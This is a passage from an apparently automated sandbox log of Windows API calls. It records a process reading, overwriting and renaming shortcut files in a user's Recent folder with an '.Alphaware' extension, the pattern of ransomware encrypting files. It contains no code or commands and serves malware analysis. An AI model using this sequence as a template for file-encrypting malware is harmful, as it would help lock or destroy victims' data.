lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.742] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd03e5940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd03e5940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d0d9fa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1334)) returned 1 [0098.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.742] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk.alphaware")) returned 1 [0098.743] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk", dwFileAttributes=0x80) returned 1 [0098.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.744] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2446970 | out: lpFileInformation=0x2446970*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffbb2c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe31)) returned 1 [0098.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.744] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.744] ReadFile (in: hFile=0x250, lpBuffer=0x2447a98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2447a98*, lpNumberOfBytesRead=0x23e958*=0xe31, lpOverlapped=0x0) returned 1 [0098.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.774] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.777] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d126260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8)) returned 1 [0098.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.777] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TVHtwFsg.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tvhtwfsg.flv.lnk.alphaware")) returned 1 [0098.778] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk", dwFileAttributes=0x80) returned 1 [0098.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.779] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24d01f8 | out: lpFileInformation=0x24d01f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf4468e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ea)) returned 1 [0098.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.779] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.779] ReadFile (in: hFile=0x250, lpBuffer=0x24d0ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24d0ed8*, lpNumberOfBytesRead=0x23e958*=0x9ea, lpOverlapped=0x0) returned 1 [0098.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.803] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf4468e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf4468e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d172520, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08)) returned 1 [0098.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.805] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\U6t2jBTAet1hJh.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\u6t2jbtaet1hjh.lnk.alphaware")) returned 1 [0098.807] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk", dwFileAttributes=0x80) returned 1 [0098.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25562d8 | out: lpFileInformation=0x25562d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a715c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa00)) returned 1 [0098.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.807] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.808] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.808] ReadFile (in: hFile=0x250, lpBuffer=0x2556fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2556fe8*, lpNumberOfBytesRead=0x23e958*=0xa00, lpOverlapped=0x0) returned 1 [0098.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.833] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.835] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d1be7e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe34)) returned 1 [0098.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.836] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UgJB0bK8M6Fbzeqf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ugjb0bk8m6fbzeqf.lnk.alphaware")) returned 1 [0098.837] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk", dwFileAttributes=0x80) returned 1 [0098.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.837] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25dc558 | out: lpFileInformation=0x25dc558*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcec3dea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1f7)) returned 1 [0098.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.838] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.838] ReadFile (in: hFile=0x250, lpBuffer=0x25dca60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25dca60*, lpNumberOfBytesRead=0x23e958*=0x1f7, lpOverlapped=0x0) returned 1 [0098.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.869] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.871] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec3dea0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d20aaa0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374)) returned 1 [0098.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.872] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\UKlsVP0OeoLUyu0aA.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\uklsvp0oeoluyu0aa.lnk.alphaware")) returned 1 [0098.873] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk", dwFileAttributes=0x80) returned 1 [0098.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.874] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x245c060 | out: lpFileInformation=0x245c060*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cf8d20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x18df)) returned 1 [0098.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.874] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.874] ReadFile (in: hFile=0x250, lpBuffer=0x245c318, nNumberOfBytesToRead=0x18df, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x245c318*, lpNumberOfBytesRead=0x23e958*=0x18df, lpOverlapped=0x0) returned 1 [0098.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.900] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d256d60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21f4)) returned 1 [0098.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.904] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uPx6uzdIPR.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\upx6uzdipr.lnk.alphaware")) returned 1 [0098.905] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk", dwFileAttributes=0x80) returned 1 [0098.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24ec118 | out: lpFileInformation=0x24ec118*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd12c62c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12c62c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12c62c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x12d0)) returned 1 [0098.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.906] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.906] ReadFile (in: hFile=0x250, lpBuffer=0x24ec3d0, nNumberOfBytesToRead=0x12d0, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24ec3d0*, lpNumberOfBytesRead=0x23e958*=0x12d0, lpOverlapped=0x0) returned 1 [0098.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.931] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12c62c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12c62c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d2a3020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19f4)) returned 1 [0098.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.931] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\V8U50BNOH.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\v8u50bnoh.lnk.alphaware")) returned 1 [0098.932] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk", dwFileAttributes=0x80) returned 1 [0098.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.933] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\vCNVmrhf2U7XXJBaxRmB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\vcnvmrhf2u7xxjbaxrmb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2577708 | out: lpFileInformation=0x2577708*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcef5db80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed)) returned 1 [0098.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.933] CreateFileW 